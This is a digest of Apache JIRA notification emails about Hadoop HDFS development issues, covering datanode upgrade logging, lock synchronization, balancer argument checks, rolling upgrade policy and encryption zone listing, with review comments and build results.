>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6797.patch
>
>
> Before upgrade, data node version was -55. The new data node version remained 
> at -55. During the upgrade we got the following messages:
> {code}
> 2014-07-15 12:59:55,253 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Data-node version: -55 and name-node layout version: -56
> ...
> ...
> ...
> ...
> 2014-07-15 12:59:56,479 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrading block pool storage directory 
> /hadoop/1/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239.
>old LV = -55; old CTime = 1402508907789.
>new LV = -56; new CTime = 1405453914270
> 2014-07-15 13:00:07,697 INFO org.apache.hadoop.hdfs.server.common.Storage: 
> Upgrade of block pool BP-825373266-xx.xxx.xxx.xx-1379095203239 at 
> /hadoop/12/data1/current/BP-825373266-xx.xxx.xxx.xx-1379095203239 is complete
> 2014-07-15 13:00:07,839 INFO org.apache.hadoop.hdfs.server.datanode.DataNode: 
> Setting up storage: 
> nsid=859725752;bpid=BP-825373266-xx.xxx.xxx.xx-1379095203239;lv=-55;nsInfo=lv=-56;cid=CID-303ee504-e03c-4a5e-bc59-2b275b308152;nsid=859725752;c=1405453914270;bpid=BP-82537326
> 6-xx.xxx.xxx.xx-1379095203239;dnuuid=b1011b87-d7cd-48ce-92cc-f7cca0e8cbae
> {code}
> After the upgrade completed, restarting the DN still shows a message about the 
> version difference:
> {code}
> INFO org.apache.hadoop.hdfs.server.common.Storage: Data-node version: -55 and 
> name-node layout version: -56
> {code}
> This confuses operators into thinking the upgrade did not succeed, since the 
> data node's layout version appears not to be updated to the "new LV" value.
> In fact, it is the name node's layout version that is displayed as the "new LV" value.
> Since the data node and name node layout versions are now separate, the new 
> data node layout version should be shown as the "new LV".
> Thanks to [~ehf] who found and reported this issue.





[jira] [Commented] (HDFS-6798) Add test case for incorrect data node condition during balancing

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6798?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081753#comment-14081753
 ] 

Arpit Agarwal commented on HDFS-6798:
-

+1 for the patch, pending Jenkins.

Thanks for adding this test case Benoy!

> Add test case for incorrect data node condition during balancing
> 
>
> Key: HDFS-6798
> URL: https://issues.apache.org/jira/browse/HDFS-6798
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6798.patch
>
>
> The Balancer makes a check to see if a block's location is a known data node. 
> But the variable it uses to check is wrong. This issue was fixed in HDFS-6364.
> There was no way to easily unit test it at that time. Since HDFS-6441 enables 
> one to simulate this case, it was decided to add the unit test once HDFS-6441 
> is resolved.





[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Arpit Agarwal (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081748#comment-14081748
 ] 

Arpit Agarwal commented on HDFS-6788:
-

Thanks Andrew/Yongjun for verifying the lock order correctness.

Just reviewed and +1 from me also, pending Jenkins.

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause a performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).





[jira] [Updated] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Benoy Antony (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benoy Antony updated HDFS-6796:
---

Attachment: HDFS-6796.patch

Makes sense. Thanks for the review and suggestion, [~szetszwo].
I have updated the patch with individual checks for each option. 

> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch, HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there are more than 2 arguments.





[jira] [Commented] (HDFS-6800) Determine how Datanode layout changes should interact with rolling upgrade

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6800?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081743#comment-14081743
 ] 

Colin Patrick McCabe commented on HDFS-6800:


Just to give a bit of additional context here: [~james.thomas] did some 
benchmarks that showed that "creating 200k hard links (100k blocks) take just 
over a second on a dual core PC" when using the optimized hard link code.  On a 
performance basis, I think it's very feasible to support rolling upgrade to new 
DN layout versions.

If we don't choose to support this, we are going to make it very hard to evolve 
the DN code in the future.  We would then require a major version change (i.e. 
Hadoop 3.0) to make any major DN changes.  So I think we should just change the 
documentation a bit and support this in the obvious way... by having the users 
call {{datanode \-rollback}} during a rolling rollback if needed.  What do you 
guys think?
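The upgrade-by-hard-link approach the benchmark refers to can be sketched with `java.nio.file.Files.createLink`. This is an illustrative demo only, not the DataNode's actual upgrade code:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

class HardLinkUpgradeSketch {
    // Links a "block file" from the old layout directory into the new one
    // instead of copying it, so the block data is never rewritten.
    static boolean demo() {
        try {
            Path oldDir = Files.createTempDirectory("bp-old");
            Path newDir = Files.createTempDirectory("bp-new");
            Files.write(oldDir.resolve("blk_1"), new byte[]{42});
            Files.createLink(newDir.resolve("blk_1"), oldDir.resolve("blk_1"));
            return Files.exists(newDir.resolve("blk_1"));
        } catch (IOException e) {
            return false;
        }
    }
}
```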

> Determine how Datanode layout changes should interact with rolling upgrade
> -
>
> Key: HDFS-6800
> URL: https://issues.apache.org/jira/browse/HDFS-6800
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.6.0
>Reporter: Colin Patrick McCabe
>
> We need to handle attempts to rolling-upgrade the DataNode to a new storage 
> directory layout.
> One approach is to disallow such upgrades.  If we choose this approach, we 
> should make sure that the system administrator gets a helpful error message 
> and a clean failure when trying to use rolling upgrade to a version that 
> doesn't support it.  Based on the compatibility guarantees described in 
> HDFS-5535, this would mean that *any* future DataNode layout changes would 
> require a major version upgrade.
> Another approach would be to support rolling upgrade from an old DN storage 
> layout to a new layout.  This approach requires us to change our 
> documentation to explain to users that they should supply the {{\-rollback}} 
> command on the command-line when re-starting the DataNodes during rolling 
> rollback.  Currently the documentation just says to restart the DataNode 
> normally.
> Another issue here is that the DataNode's usage message describes rollback 
> options that no longer exist.  The help text says that the DN supports 
> {{\-rollingupgrade rollback}}, but this option was removed by HDFS-6005.





[jira] [Work started] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Work on HDFS-6780 started by Andrew Wang.

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.





[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Affects Version/s: fs-encryption (HADOOP-10150 and HDFS-6134)

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Affects Versions: fs-encryption (HADOOP-10150 and HDFS-6134)
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.





[jira] [Commented] (HDFS-6482) Use block ID-based block layout on datanodes

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6482?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081739#comment-14081739
 ] 

Colin Patrick McCabe commented on HDFS-6482:


Hey guys, I filed HDFS-6800 to have the rolling upgrade discussion.  I'm going 
to commit this to trunk (but *not* to any other branches) in a bit if nobody 
has any objections.

> Use block ID-based block layout on datanodes
> 
>
> Key: HDFS-6482
> URL: https://issues.apache.org/jira/browse/HDFS-6482
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: James Thomas
>Assignee: James Thomas
> Attachments: 6482-design.doc, HDFS-6482.1.patch, HDFS-6482.2.patch, 
> HDFS-6482.3.patch, HDFS-6482.4.patch, HDFS-6482.5.patch, HDFS-6482.6.patch, 
> HDFS-6482.7.patch, HDFS-6482.8.patch, HDFS-6482.9.patch, HDFS-6482.patch, 
> hadoop-24-datanode-dir.tgz
>
>
> Right now blocks are placed into directories that are split into many 
> subdirectories when capacity is reached. Instead we can use a block's ID to 
> determine the path it should go in. This eliminates the need for the LDir 
> data structure that facilitates the splitting of directories when they reach 
> capacity as well as fields in ReplicaInfo that keep track of a replica's 
> location.
> An extension of the work in HDFS-3290.
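The ID-based placement can be sketched by deriving a fixed two-level subdirectory from bits of the block ID. This is a sketch of the idea; the exact bit positions and directory names used by HDFS may differ:

```java
class BlockIdLayoutSketch {
    // Derive a stable two-level directory from the block ID, so a block's
    // path can be computed directly instead of being tracked per replica.
    static String idToBlockDir(long blockId) {
        int d1 = (int) ((blockId >> 16) & 0x1F); // 32 top-level subdirs
        int d2 = (int) ((blockId >> 8) & 0x1F);  // 32 second-level subdirs
        return "subdir" + d1 + "/subdir" + d2;
    }
}
```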





[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Andrew Wang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081736#comment-14081736
 ] 

Andrew Wang commented on HDFS-6788:
---

I don't see any cases where a thread with the read lock would try to get the 
write lock. The four methods that take the read lock are getNamespaceInfo, 
getActiveNN, getBlockPoolId, and toString, and they all look safe.

+1 pending Jenkins from me.

Yongjun, for the indirection, it's probably not a big deal since the JIT is 
pretty likely to inline it. Unless we see this crop up as an issue, I'm 
inclined not to bother since we have much bigger perf issues (for instance, 
that there is a global RW lock).
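The change under review can be sketched as guarding the block pool ID with a `ReentrantReadWriteLock`. This is a minimal sketch of the locking pattern, not the actual BPOfferService code:

```java
import java.util.concurrent.locks.ReentrantReadWriteLock;

class BPOfferServiceLockSketch {
    private final ReentrantReadWriteLock lock = new ReentrantReadWriteLock();
    private String blockPoolId;

    // Many reader threads (DataXceiver, PacketResponder, ...) can hold the
    // read lock concurrently instead of serializing on a synchronized method.
    String getBlockPoolId() {
        lock.readLock().lock();
        try {
            return blockPoolId;
        } finally {
            lock.readLock().unlock();
        }
    }

    // Writers (e.g. namespace registration) take the exclusive write lock.
    void setBlockPoolId(String id) {
        lock.writeLock().lock();
        try {
            blockPoolId = id;
        } finally {
            lock.writeLock().unlock();
        }
    }
}
```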

> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause a performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).





[jira] [Commented] (HDFS-6794) Update BlockManager methods to use DatanodeStorageInfo where possible

2014-07-31 Thread Hadoop QA (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6794?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081734#comment-14081734
 ] 

Hadoop QA commented on HDFS-6794:
-

{color:red}-1 overall{color}.  Here are the results of testing the latest 
attachment 
  http://issues.apache.org/jira/secure/attachment/12658982/HDFS-6794.03.patch
  against trunk revision .

{color:green}+1 @author{color}.  The patch does not contain any @author 
tags.

{color:green}+1 tests included{color}.  The patch appears to include 4 new 
or modified test files.

{color:green}+1 javac{color}.  The applied patch does not increase the 
total number of javac compiler warnings.

{color:green}+1 javadoc{color}.  There were no new javadoc warning messages.

{color:green}+1 eclipse:eclipse{color}.  The patch built with 
eclipse:eclipse.

{color:red}-1 findbugs{color}.  The patch appears to introduce 2 new 
Findbugs (version 2.0.3) warnings.

{color:green}+1 release audit{color}.  The applied patch does not increase 
the total number of release audit warnings.

{color:red}-1 core tests{color}.  The patch failed these unit tests in 
hadoop-hdfs-project/hadoop-hdfs:

  
org.apache.hadoop.hdfs.server.namenode.ha.TestPipelinesFailover

{color:green}+1 contrib tests{color}.  The patch passed contrib unit tests.

Test results: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7515//testReport/
Findbugs warnings: 
https://builds.apache.org/job/PreCommit-HDFS-Build/7515//artifact/trunk/patchprocess/newPatchFindbugsWarningshadoop-hdfs.html
Console output: https://builds.apache.org/job/PreCommit-HDFS-Build/7515//console

This message is automatically generated.

> Update BlockManager methods to use DatanodeStorageInfo where possible
> -
>
> Key: HDFS-6794
> URL: https://issues.apache.org/jira/browse/HDFS-6794
> Project: Hadoop HDFS
>  Issue Type: Improvement
>Reporter: Arpit Agarwal
>Assignee: Arpit Agarwal
> Attachments: HDFS-6794.01.patch, HDFS-6794.02.patch, 
> HDFS-6794.03.patch
>
>
> Post HDFS-2832, BlockManager methods can be updated to accept 
> DatanodeStorageInfo instead of (DatanodeDescriptor + StorageID).





[jira] [Created] (HDFS-6800) Determine how Datanode layout changes should interact with rolling upgrade

2014-07-31 Thread Colin Patrick McCabe (JIRA)
Colin Patrick McCabe created HDFS-6800:
--

 Summary: Determine how Datanode layout changes should interact with 
rolling upgrade
 Key: HDFS-6800
 URL: https://issues.apache.org/jira/browse/HDFS-6800
 Project: Hadoop HDFS
  Issue Type: Improvement
  Components: datanode
Affects Versions: 2.6.0
Reporter: Colin Patrick McCabe


We need to handle attempts to rolling-upgrade the DataNode to a new storage 
directory layout.

One approach is to disallow such upgrades.  If we choose this approach, we 
should make sure that the system administrator gets a helpful error message and 
a clean failure when trying to use rolling upgrade to a version that doesn't 
support it.  Based on the compatibility guarantees described in HDFS-5535, this 
would mean that *any* future DataNode layout changes would require a major 
version upgrade.

Another approach would be to support rolling upgrade from an old DN storage 
layout to a new layout.  This approach requires us to change our documentation 
to explain to users that they should supply the {{\-rollback}} command on the 
command-line when re-starting the DataNodes during rolling rollback.  Currently 
the documentation just says to restart the DataNode normally.

Another issue here is that the DataNode's usage message describes rollback 
options that no longer exist.  The help text says that the DN supports 
{{\-rollingupgrade rollback}}, but this option was removed by HDFS-6005.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: (was: HDFS-6799.patch)

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Updated] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Megasthenis Asteris (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Megasthenis Asteris updated HDFS-6799:
--

Attachment: HDFS-6799.patch

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Commented] (HDFS-6788) Improve synchronization in BPOfferService with read write lock

2014-07-31 Thread Yongjun Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6788?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081708#comment-14081708
 ] 

Yongjun Zhang commented on HDFS-6788:
-

I thought I had made a mistake in the earlier patch after seeing Arpit's 
comment, but after careful review, it looks fine to me.

Hi [~andrew.wang],

I uploaded a patch to address your second comment. As for the extra newline in 
the imports section, it's added by Eclipse to separate the com.google and 
org.apache imports into different sections; I think that's reasonable, so I 
didn't change it. Would you please take a look at the new revision? Thanks.
 

Hi [~arpitagarwal], thanks for reviewing it earlier; if you have time, I would 
appreciate it if you could take another look.

BTW Andrew, I noticed that the lock code in both FSDirectory and FSNamesystem 
has quite a bit of indirection (and thus a bit more runtime cost) when making a call, say,
{code}
  void readLock() {
this.dirLock.readLock().lock();
  }
{code}
Each call goes through several "." dereferences, and each one is an indirection. 
This can be improved. For example, we can create a class member, e.g., {{mReadLock = 
this.dirLock.readLock();}}, and then modify the readLock() method to
{code}
 void readLock() {
mReadLock.lock();
 }
{code}
I can create a jira to change both classes if you agree. Thanks.


> Improve synchronization in BPOfferService with read write lock
> --
>
> Key: HDFS-6788
> URL: https://issues.apache.org/jira/browse/HDFS-6788
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode
>Affects Versions: 2.5.0
>Reporter: Yongjun Zhang
>Assignee: Yongjun Zhang
> Attachments: HDFS-6788.001.patch, HDFS-6788.002.patch
>
>
> Threads in DN (DataXceiver, PacketResponder, Async disk worker etc) may block 
> at BPOfferService.getBlockPoolId() when calling BPOfferService.checkBlock(), 
> though they are just reading the same blockpool id. This is unnecessary 
> overhead and may cause performance hit when many threads compete. Filing this 
> jira to replace synchronized method with read write lock 
> (ReentrantReadWriteLock).





[jira] [Commented] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Benoy Antony (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081706#comment-14081706
 ] 

Benoy Antony commented on HDFS-6799:


Can you please make [~megas] a contributor so that he can assign this to 
himself?

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Commented] (HDFS-6799) The invalidate method in SimulatedFSDataset.java failed to remove (invalidate) blocks from the file system.

2014-07-31 Thread Benoy Antony (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6799?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081704#comment-14081704
 ] 

Benoy Antony commented on HDFS-6799:


Good catch, [~megas].
Is there a way to add a unit test for this?
[~arpitagarwal], [~szetszwo], could you please take a look?
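
A unit test does seem feasible: inject a few blocks, call invalidate, and assert the invalidated replicas are gone while the others remain. A hedged, self-contained sketch of that check against a toy map-backed dataset (this is an illustrative model, not the real SimulatedFSDataset API):

```java
import java.util.HashMap;
import java.util.Map;

// Toy model of a simulated dataset keyed by (bpid, blockId).
class ToyDataset {
    private final Map<String, Map<Long, byte[]>> pools = new HashMap<>();

    void addBlock(String bpid, long blockId, byte[] data) {
        pools.computeIfAbsent(bpid, k -> new HashMap<>()).put(blockId, data);
    }

    // The behavior under discussion: invalidate must actually remove
    // each listed block from the (simulated) storage.
    void invalidate(String bpid, long[] invalidBlks) {
        Map<Long, byte[]> pool = pools.get(bpid);
        if (pool == null) return;
        for (long id : invalidBlks) {
            pool.remove(id);
        }
    }

    boolean contains(String bpid, long blockId) {
        Map<Long, byte[]> pool = pools.get(bpid);
        return pool != null && pool.containsKey(blockId);
    }
}
```

A real test would do the same through SimulatedFSDataset's public methods and then assert the blocks are no longer reported.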

> The invalidate method in SimulatedFSDataset.java failed to remove 
> (invalidate) blocks from the file system.
> ---
>
> Key: HDFS-6799
> URL: https://issues.apache.org/jira/browse/HDFS-6799
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: datanode, test
>Affects Versions: 2.4.1
>Reporter: Megasthenis Asteris
>Priority: Minor
> Attachments: HDFS-6799.patch
>
>
> The invalidate(String bpid, Block[] invalidBlks) method in 
> SimulatedFSDataset.java should remove all invalidBlks from the simulated file 
> system. It currently fails to do that.





[jira] [Updated] (HDFS-6780) Batch the encryption zones listing API

2014-07-31 Thread Andrew Wang (JIRA)

 [ 
https://issues.apache.org/jira/browse/HDFS-6780?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Wang updated HDFS-6780:
--

Attachment: hdfs-6780.001.patch

Patch attached. Refactored listEncryptionZones to instead return a 
RemoteIterator, which wraps a 
BatchedRemoteIterator.
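
The batching pattern is roughly: the iterator fetches one page of results per remote call and hands out elements until the page is exhausted, then fetches the next page. A simplified, self-contained sketch of the idea (this is not the actual Hadoop BatchedRemoteIterator API; the backing list stands in for the NameNode and the page size is illustrative):

```java
import java.util.ArrayList;
import java.util.Iterator;
import java.util.List;

// Illustrative batched iterator: pulls fixed-size pages from a backing
// list, the way a batched listEncryptionZones would pull from the NameNode.
class BatchedIterator<T> implements Iterator<T> {
    private final List<T> source;   // stand-in for the remote store
    private final int batchSize;
    private List<T> batch = new ArrayList<>();
    private int nextIndex = 0;      // resume position ("cookie") in the source
    private int posInBatch = 0;

    BatchedIterator(List<T> source, int batchSize) {
        this.source = source;
        this.batchSize = batchSize;
    }

    private void maybeFetch() {
        if (posInBatch < batch.size()) return;
        // One simulated RPC: copy the next page out of the source.
        int end = Math.min(nextIndex + batchSize, source.size());
        batch = new ArrayList<>(source.subList(nextIndex, end));
        nextIndex = end;
        posInBatch = 0;
    }

    @Override public boolean hasNext() { maybeFetch(); return posInBatch < batch.size(); }
    @Override public T next() { maybeFetch(); return batch.get(posInBatch++); }
}
```

The future-proofing benefit is that callers only see an iterator, so the server can later change the batch size, or stream results, without an API change.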

> Batch the encryption zones listing API
> --
>
> Key: HDFS-6780
> URL: https://issues.apache.org/jira/browse/HDFS-6780
> Project: Hadoop HDFS
>  Issue Type: Sub-task
>  Components: security
>Reporter: Andrew Wang
>Assignee: Andrew Wang
> Attachments: hdfs-6780.001.patch
>
>
> To future-proof the API, it'd be better if the listEZs API returned a 
> RemoteIterator.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081694#comment-14081694
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

[~stevebovy]: you'll be happy to hear that we dynamically load {{libjvm.so}} in 
the HADOOP-10388 branch.  The main reason for doing it there is that the branch 
adds a pure native client which doesn't require {{libjvm.so}}, in addition to 
the existing JNI client.

> Porting libhdfs to Windows
> --
>
> Key: HDFS-573
> URL: https://issues.apache.org/jira/browse/HDFS-573
> Project: Hadoop HDFS
>  Issue Type: Improvement
>  Components: libhdfs
> Environment: Windows, Visual Studio 2008
>Reporter: Ziliang Guo
>Assignee: Chris Nauroth
> Attachments: HDFS-573.1.patch
>
>   Original Estimate: 336h
>  Remaining Estimate: 336h
>
> The current C code in libhdfs is written using C99 conventions and also uses 
> a few POSIX specific functions such as hcreate, hsearch, and pthread mutex 
> locks.  To compile it using Visual Studio would require a conversion of the 
> code in hdfsJniHelper.c and hdfs.c to C89 and replacement/reimplementation of 
> the POSIX functions.  The code also uses the stdint.h header, which is not 
> part of the original C89, but there exists what appears to be a BSD licensed 
> reimplementation written to be compatible with MSVC floating around.  I have 
> already done the other necessary conversions, as well as created a simplistic 
> hash bucket for use with hcreate and hsearch and successfully built a DLL of 
> libhdfs.  Further testing is needed to see if it is usable by other programs 
> to actually access hdfs, which will likely happen in the next few weeks as 
> the Condor Project continues with its file transfer work.
> In the process, I've removed a few what I believe are extraneous consts and 
> also fixed an incorrect array initialization where someone was attempting to 
> initialize with something like this: JavaVMOption options[noArgs]; where 
> noArgs was being incremented in the code above.  This was in the 
> hdfsJniHelper.c file, in the getJNIEnv function.





[jira] [Commented] (HDFS-6796) Improving the argument check during balancer command line parsing

2014-07-31 Thread Tsz Wo Nicholas Sze (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-6796?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081695#comment-14081695
 ] 

Tsz Wo Nicholas Sze commented on HDFS-6796:
---

Let's also add some meaningful error messages.  The first checkArgument(..) can 
be replaced by a checkArgument(..) in each individual case, as below.
{code}
+++ 
hadoop-hdfs-project/hadoop-hdfs/src/main/java/org/apache/hadoop/hdfs/server/balancer/Balancer.java
  (working copy)
@@ -1691,9 +1691,9 @@
   if (args != null) {
 try {
   for(int i = 0; i < args.length; i++) {
-checkArgument(args.length >= 2, "args = " + Arrays.toString(args));
 if ("-threshold".equalsIgnoreCase(args[i])) {
-  i++;
+  checkArgument(++i < args.length,
+  "Threshold value is missing: args = " + 
Arrays.toString(args));
   try {
 threshold = Double.parseDouble(args[i]);
 if (threshold < 1 || threshold > 100) {
@@ -1708,7 +1708,8 @@
 throw e;
   }
 } else if ("-policy".equalsIgnoreCase(args[i])) {
-  i++;
+  checkArgument(++i < args.length,
+  "Policy value is missing: args = " + Arrays.toString(args));
   try {
 policy = BalancingPolicy.parse(args[i]);
   } catch(IllegalArgumentException e) {
...
{code}
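
A self-contained sketch of the bounds-checked parsing loop suggested above (simplified from the Balancer code; {{checkArgument}} here is a plain helper standing in for Guava's Preconditions, and the method name is illustrative):

```java
import java.util.Arrays;

// Illustrative mini-parser mirroring the suggested Balancer checks:
// verify the option's value exists *before* indexing into args.
class BalancerArgsDemo {
    static void checkArgument(boolean ok, String msg) {
        if (!ok) throw new IllegalArgumentException(msg);
    }

    static double parseThreshold(String[] args) {
        double threshold = 10.0;  // assumed default
        for (int i = 0; i < args.length; i++) {
            if ("-threshold".equalsIgnoreCase(args[i])) {
                // The value must exist: ++i must still be a valid index.
                checkArgument(++i < args.length,
                    "Threshold value is missing: args = " + Arrays.toString(args));
                threshold = Double.parseDouble(args[i]);
                checkArgument(threshold >= 1 && threshold <= 100,
                    "Threshold out of range [1, 100]: " + threshold);
            }
        }
        return threshold;
    }
}
```

The per-option check fails fast with a message naming the missing value, instead of a generic complaint about the total argument count.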


> Improving the argument check during balancer command line parsing
> -
>
> Key: HDFS-6796
> URL: https://issues.apache.org/jira/browse/HDFS-6796
> Project: Hadoop HDFS
>  Issue Type: Bug
>  Components: balancer
>Affects Versions: 2.4.1
>Reporter: Benoy Antony
>Assignee: Benoy Antony
> Attachments: HDFS-6796.patch
>
>
> Currently balancer CLI parser simply checks if the total number of arguments 
> is greater than 2 inside the loop. Since the check does not include any loop 
> variables, it is not a proper check when there are more than 2 arguments.





[jira] [Commented] (HDFS-573) Porting libhdfs to Windows

2014-07-31 Thread Colin Patrick McCabe (JIRA)

[ 
https://issues.apache.org/jira/browse/HDFS-573?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=14081689#comment-14081689
 ] 

Colin Patrick McCabe commented on HDFS-573:
---

bq. I have just one question though. My initial inclination was to put 
